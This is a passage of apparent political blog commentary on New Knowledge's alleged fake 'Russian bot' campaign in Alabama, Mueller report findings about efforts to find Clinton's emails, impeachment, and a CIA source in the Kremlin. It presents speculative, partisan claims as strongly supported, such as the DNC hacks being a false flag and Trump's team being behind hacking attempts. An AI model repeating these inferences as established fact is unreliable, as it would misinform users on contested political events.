And given that only $100,000 of the $750,000 Hoffman gave to the project was spent by New Knowledge, Morgan’s speculation seems pretty reasonable. Especially after the following report about a new disinformation operation in the 2017 Alabama Senate race. And while this new one doesn’t appear to involve fake ‘Russian bot’ false flag operations, it does appear to be related to Project Birmingham: This time it was a psyop designed to look like a group of pro-alcohol prohibition Baptist teetotalers, “Dry Alabama”, running a “Pray for Roy Moore” Twitter and Facebook campaign. The idea was that if a group like that openly supported Moore this would hurt his broader support. Both the New Knowledge project and this new project each received $100,000, funneled through the same organization: Investing in US, run by Reid Hoffman’s political advisor Dmitri Mehlorn to funnel Silicon Valley money into politics:
“Political social media trickery of this sort is usually well hidden and hard to detect without help from an insider, so it’s difficult to say how common it has become. Some political veterans warn that without new laws or regulations explicitly outlawing fraudulent social media tactics, both parties may feel pressure to use them simply to stay competitive.”
Yep, it’s difficult to say how common social media trickery has become. Especially since the groups like New Knowledge that are getting tasked to study social media trickery are running their own disinformation operations and have deep conflicts of interest. It’s a reminder that we really have no idea who is behind the wave of ‘Russian troll’ activity. How much of it is the Republican party or independent right-wing operations? How much is funded by dark money? How about other nations? Or far right groups around the world wanting to influence US elections? We simply have no idea.
And both “Dry Alabama” and New Knowledge received $100,000 from the same group: Investing in US, the outfit run by Dmitri Mehlorn:
And there are at least two other social media false flag operations that appear to be part of this effort, run by Tovo Labs and Dialectica. Tovo Labs set up websites targeting Christian conservatives. We don’t know what Dialectica did, but they offer “a new generation of information weapons”:
So based on this discovery, it would appear that Jonathon Morgan of New Knowledge was probably correct when he suggested that the Project Birmingham report covers the work of other groups in addition to New Knowledge. We know about four so far. How many more are there? We’ll see. Or maybe we won’t. That’s how social media trickery works: you know that you don’t know how much of it is out there and will likely never know. But at least now we know that when you see things like Cyrillic characters left in the profiles of ‘Russian bot’ Twitter accounts, those probably aren’t actually Russian bots. Which we should have already known.
Following up on the story of New Knowledge, the cybersecurity firm that created fake “Russian bots” during the 2017 Alabama special election and also wrote the Senate Intelligence Committee’s report on the Kremlin’s cyber actions during the 2016 election, here’s a story about a new analysis that arrives at the conclusion that the Kremlin is already backing Tulsi Gabbard’s 2020 presidential campaign. It answers the question of whether or not getting caught running a false flag Russian bot campaign would harm New Knowledge’s credibility in this area: Nope, it will be as if we have no knowledge of what New Knowledge did:
“An NBC News analysis of the main English-language news sites employed by Russia in its 2016 election meddling shows Rep. Tulsi Gabbard of Hawaii, who is set to make her formal announcement Saturday, has become a favorite of the sites Moscow used when it interfered in 2016.”
Russian English-language sites like RT or Sputnik give Gabbard pretty positive coverage, something completely to be expected given her foreign policy positions, and that apparently qualifies as the sign of a looming Russian disinformation operation.
And while the coverage of Kremlin-controlled outlets is indeed a legitimate topic to be studied, this analysis isn’t limited to known Kremlin-controlled entities. According to New Knowledge, we should also treat chatter on troll sites like 8chan as signs of Kremlin influence. New Knowledge’s director of research, Renee DiResta — who, we’ll recall, was also the lead author of the Senate Intelligence Committee report — informs us that “A few of our analysts saw some chatter on 8chan saying she was a good ‘divider’ candidate to amplify”. And that 8chan chatter appears to qualify as evidence of Kremlin activity and intent. New Knowledge also found that three of the top 15 URLs shared by the 800 social media accounts affiliated with known and “suspected Russian propaganda operations” directed at U.S. citizens were about Gabbard:
And recall how it was 4chan — the sister troll site of 8chan — where someone posted that the hacked emails of Emmanuel Macron were about to be leaked two days before those emails went public. This was the hack that was conclusively blamed on Russia by the US government even though the head of French cybersecurity said it could have been anyone and the NSA refused to provide evidence it was Russia. Evidence subsequently pointed towards neo-Nazi hacker Andrew Auernheimer being behind the website that actually leaked the hacked documents. It’s all a reminder that pretending to be Kremlin trolls is exactly the kind of thing the Alt Right trolls at 8chan would LOVE to do, for the LULz if nothing else.
So might the chatter on 8chan or the other “suspected Russian propaganda operations” that the New Knowledge analysts observed actually have been Alt Right trolls pretending to be Kremlin trolls? Or was it New Knowledge’s analysts who simply assumed that the 8chan trolls must be Kremlin trolls without those trolls even trying to pretend to be Kremlin trolls? Or are the 8chan trolls just another New Knowledge false flag operation? We have no idea at this point. But we do have a pretty good idea as to whether or not New Knowledge might just completely make up fake accounts and then publicly declare them to be ‘Russian bots’.
It’s arrived! Somewhat. The Mueller report is out, albeit in redacted form. There’s no shortage of interesting findings in the report and one of the most intriguing findings has to do with the interactions between the Trump campaign and the hacked email hunting operation run by Peter Smith and the parallel email hunting operation run by Barbara Ledeen.
It has long been clear that Michael Flynn was in contact with the Smith and Ledeen operations but one of the unanswered questions swirling around these stories was whether or not Trump himself was involved or even knew about them. And the company created by Smith for this endeavor included multiple Trump campaign associates. In documents created by Smith describing the effort (which he used to attempt to recruit experts to work on it), Steve Bannon, Kellyanne Conway, and Sam Clovis were all listed by Smith as being part of it, in addition to Flynn. But what about Trump?
And now we’re learning in the Mueller report that, yes, Trump was actively encouraging these efforts. According to the report, Michael Flynn told Mueller’s team that Trump repeatedly asked Flynn during the campaign to find Hillary Clinton’s emails. It was assumed that her private server had already been hacked years earlier and that they might be available for sale on the Dark Web. Flynn, in turn, “contacted multiple people in an effort to obtain the emails,” including Peter Smith and Barbara Ledeen, according to the report.
Note that this wording suggests that Flynn may have contacted other individuals or groups too. Recall how Smith had recounted his conversations with Charles Johnson about finding the emails and Johnson told Smith he would inform a “hidden oppo network” of right-leaning opposition researchers that were also hunting for the emails about Smith’s efforts. Johnson also referred Smith to Andrew “weev” Auernheimer for more expert hacking advice. So we know that there were more efforts than just the Smith and Ledeen operations to find Hillary’s hacked emails. Were Flynn and the Trump team in contact with those other groups? That remains unclear.
And there was another person previously unknown to be involved in this effort: Erik Prince. In August of 2016, Smith informed the Trump campaign of his efforts. Later, although we don’t know when exactly, Barbara Ledeen told Smith she thought she had come across a trove of emails that might be Hillary’s. Smith wanted them authenticated and it was Erik Prince who reportedly provided the funds to hire an expert to validate whether or not the emails were real. The expert concluded they were not real. Recall that it was also in early August of 2016 that Prince and George Nader made a secret trip to Trump Tower with the CEO of Psy Group to inform Trump that the crown princes of the UAE and Saudi Arabia wanted to help him win and had a social media manipulation campaign all ready to go. Also recall how the services Psy Group offered clients included obtaining hacked materials and political dirty tricks. So in August of 2016 Prince was pitching the services of a company with hacking expertise on behalf of the UAE and Saudi Arabia, and at some point after that he’s also financing an expert to look over emails Peter Smith acquired on the Dark Web. So it would appear that Erik Prince was also part of the GOP’s covert email-hunting effort:
“President Trump pushed for obtaining Democratic rival Hillary Clinton’s private emails, and his campaign was in touch with allies who were pursuing them, according to the redacted special counsel’s report released Thursday.”
It’s a pretty big revelation. Except it’s not entirely a revelation since he publicly pushed for Russia to obtain those emails. But that was always brushed off as a joke. Learning that Flynn claimed that Trump “made this request repeatedly” to Flynn during the campaign is indeed new. And note how the report indicates that Flynn reached out to more people than just Smith and Ledeen in this effort:
Then, in August, Smith writes to Sam Clovis to let the Trump team know about his work. At some point after that, Barbara Ledeen tells Smith she thinks she might have Hillary’s hacked emails, and it’s none other than Erik Prince who pays for an expert to authenticate them:
Might that tech adviser hired by Prince have been associated with Psy Group? At this point we don’t know but that would be a remarkable twist. Either way, the fact that Prince was directly involved in multiple Saudi/UAE efforts during this period (don’t forget the entire ‘Seychelles backchannel’ episode that also appeared to be a UAE-driven enterprise immediately after the election) and he was also involved with the Trump team’s hacking-related activities raises a whole lot of new questions.
And that’s perhaps one of the key takeaways from the release of the Mueller report regarding the Trump campaign’s hacking efforts: The report ended up raising a whole lot of new hacking-related questions. Questions that will presumably remain unanswered.
Ever since President Trump told Lester Holt in a televised interview that he was thinking of “this Russia thing” when he fired former FBI director James Comey, the question of whether or not President Trump should get impeached for obstruction of justice alone has been one of the biggest questions looming over his presidency. After all, once Trump started publicly engaging in what appears to be blatant obstruction of justice, the question of whether or not he colluded with Russia becomes somewhat moot when it comes to whether or not he should be impeached.
Flash forward to today, and we’re finding that there’s literally an entire section of the Mueller report dedicated to Trump’s obstruction of justice, and it makes a compelling case. It turns out that a president who admits to obstructing justice in public might also be trying like hell to obstruct justice in private. Go figure.
Since obstruction of justice is arguably one of the worst crimes a president can commit because it’s such a direct attack on the legal principle that no one is above the law, the question of whether or not the country can afford to not impeach Trump and leave that kind of precedent is now going to be one of the central questions heading into the 2020 election cycle. At the same time, there’s no indication at all that Trump’s supporters are moved by these obstruction of justice charges and any attempts to impeach Trump will inevitably become a hyper-partisan affair with repercussions that are difficult to predict.
So the documented extensive obstruction of justice as recounted by Trump’s staff in the Mueller report and in Trump’s own public statements really does represent a kind of existential crisis for the US: Trump really did repeatedly cross lines that presidents should never cross because it’s so dangerous to the rule of law, but that doesn’t change the fact that the US is politically broken in all sorts of other ways that make impeachment a particularly perilous endeavor. It’s guaranteed there’s going to be a complete far right meltdown and no guarantee that the meltdown won’t end up damaging the country even more. Impeachment is both compelling and perilous.
And that’s all why it’s going to be critical for those backing impeachment to recognize that when it comes to the other half of the Mueller report — the half detailing the allegations surrounding the Russian ‘active measures’ in the US campaign and hacks of the Democrats — the evidence laid out in the report was basically a summary of the same evidence we saw in the Mueller team’s previous indictments. And as we’ve seen over and over, that evidence was far from compelling.
What has changed with the issuing of the report, however, is a strengthening of the circumstantial evidence pointing towards the Trump team having a role in the hacks. And that’s part of what makes potential impeachment proceedings against Trump so fascinating: one of the obvious potential defenses the Trump team could have against Russian collusion is to point out how weak the actual evidence is that the Kremlin really did carry out a vast social media manipulation campaign and really was behind the ‘Fancy Bear’ hacks against the Democrats. But that defense simultaneously invites speculation about who else may have been involved in those hacks, and growing amounts of evidence point back towards the Trump team and its affiliates. So while the issuing of the Mueller report might have a ‘case closed’ feel to it, the fact that the report invites impeachment and impeachment, in turn, invites a thorough reexamination of the evidence underlying the report suggests we could actually be looking at a ‘case reopening’ period for #TrumpRussia, and that could get really awkward for Trump in entirely new ways.
One of the defining features of the RussiaGate scandal has been the fact that the evidence of what the Kremlin did has always been highly dubious. The Russian social media manipulation campaign as described by Mueller’s investigators appears to be an insignificant joke in the scheme of things. And the hacks, while undeniably impactful, look like some sort of false flag set up by a third party unless the Kremlin was trying to frame itself, with the indictment against the GRU citing almost no evidence and the evidence it did cite being highly ambiguous. None of those problems with the evidence changed with the final report.
But the report did inform us that Michael Flynn told Mueller’s team that Trump repeatedly made requests to associates to find Hillary Clinton’s deleted emails. We’ve also learned that Erik Prince — who offered the services of Psy Group to the Trump campaign on behalf of Saudi Arabia and the UAE — paid for a technical expert who worked with Peter Smith’s and Barbara Ledeen’s email-hunting teams. So Trump himself was actively pushing for the recovery of Hillary’s deleted emails and there were multiple teams we know about with the motive and the means to not just scour the Dark Web for hackers who they assumed might have Hillary’s emails but also carry out hacking attempts of their own. Both Psy Group and Cambridge Analytica would have likely had the technical ability to carry out hacking attempts themselves that are made to look like ‘Russian’ hacks.
Here’s a key example of how the circumstantial evidence increasingly suggests that the Trump team or its associates could have been involved in the hacks and hacking attempts: Also highlighted in the report as evidence of apparent Trump campaign collusion with Russia is the fact that there was a hacking attempt against Hillary Clinton’s personal office just 5 hours after Trump made his infamous public plea during a campaign event on July 27, 2016, for Russia to find Hillary’s deleted emails from her private server. And this was the first known attack against that server that investigators could detect. This coincidence is portrayed as compelling circumstantial evidence of how the Kremlin and the Trump team were effectively working in a coordinated manner whether or not there was an explicit agreement of collusion.
But there are a number of different ways to interpret that coincidence of Trump’s call for a Russian hack followed by the first attempt on Hillary’s private office. For example, now that we know Trump started asking his own teams to find Hillary’s deleted emails — which is an implicit request to potentially hack something like Hillary’s personal office in the hopes of finding them there — why is there no speculation that Trump’s public call for Russia to do the hacking was rhetorical cover for his own hacking teams?
Keep in mind that July 27, 2016, was days after Wikileaks made its first public dump of hacked Democratic emails and documents on July 22, so it was only at that point that the Trump campaign would have been aware that the deleted emails from Hillary Clinton’s private server were not likely in the anticipated trove Wikileaks had for release.
And there’s another new fun fact in the Mueller report about Barbara Ledeen’s email-hunting team: When Ledeen wrote a proposal to Peter Smith in December 2015 for the email-hunting project, Ledeen was convinced that specifically finding evidence that Hillary’s private email server had been hacked was crucial for the election. The hacking of the DNC and DCCC may have been embarrassing. But the Republicans had been spending years making the case that Hillary’s private email server was a unique national security risk because it could be hacked.
In addition, Ledeen’s proposal to Smith includes a plan to check with certain intelligence sources “that have access through liaison work with various foreign services” to determine if any of those services had gotten to the server. So the Ledeen team apparently had a foreign intelligence tie of some sort. From pages 62–63 in the Mueller Report...:
So Ledeen’s email-hunting team had some sort of foreign intelligence connection and was determined to specifically find emails from Hillary’s private server. Then, five days after the Wikileaks dump that didn’t include any emails from her server, we have Trump make a public call for Russia to find the deleted emails from the server and multiple private calls for the multiple email-hunting teams already working with the Trump campaign to find the emails. Doesn’t that all make the Trump team a prime suspect for that hacking attempt against Hillary’s private office just hours after Trump’s public call? Might Trump have intentionally made that public shout-out to Russia as cover for a planned hacking attempt by his team? Now that we know Trump was actively involved in pushing for obtaining those deleted emails right at this time, the possibility that he was consciously putting out the call to Russia as cover for his own teams starts looking like a much more plausible scenario.
That’s an example of the kind of evidentiary mines lying in wait for the US if there’s a big reexamination of the evidence behind this report during any upcoming impeachment hearings. And keep in mind that if it is the case that the Trump team was indeed involved with the hacking attempts and covered that up, that should also count as obstruction of justice.
There was a notable update on the official story of how the US government arrived at the conclusion that Vladimir Putin personally ordered the hacking of the Democratic National Committee in 2016. First, recall the reports from June of 2017 about how it was a source deep inside the Kremlin that was the basis for the conclusion that Putin personally ordered a hacking campaign intended to harm Hillary Clinton and help Donald Trump. Well, we’re now learning that this deep Kremlin source has since been exfiltrated from Russia and is living somewhere in the DC area now.
We’re told that this source wasn’t a direct part of Putin’s inner circle but saw him regularly and had access to high-level Kremlin decision-making. The source was recruited decades ago while they were a midlevel Russian official. The source rose through the ranks and eventually landed a position that gave them access to the highest levels of the Kremlin.
Interestingly, the exfiltration process reportedly led to some concerns about the trustworthiness of this source. The CIA initially suggested removing this source from Russia in late 2016 over concerns about their safety. But the source initially rejected the exfiltration offer, citing family concerns. It was this rejection that created concerns within the CIA about the trustworthiness of this source and fears that the source was a double agent. It was the news coverage about the #TrumpRussia scandal in the spring and summer of 2017 that convinced CIA officials to once again offer to exfiltrate this source. This time the source agreed, helping to put to rest some of the fears about their trustworthiness. We’re told that some CIA officials had other reasons to fear the source was a double agent, but we aren’t given details about the nature of those fears. So overall, it sounds like this source became a crucial linchpin for the CIA’s assessment about the DNC hack around the same time there were concerns about the source’s trustworthiness. Concerns that were put aside once the source eventually agreed to be exfiltrated at some point after the summer of 2017: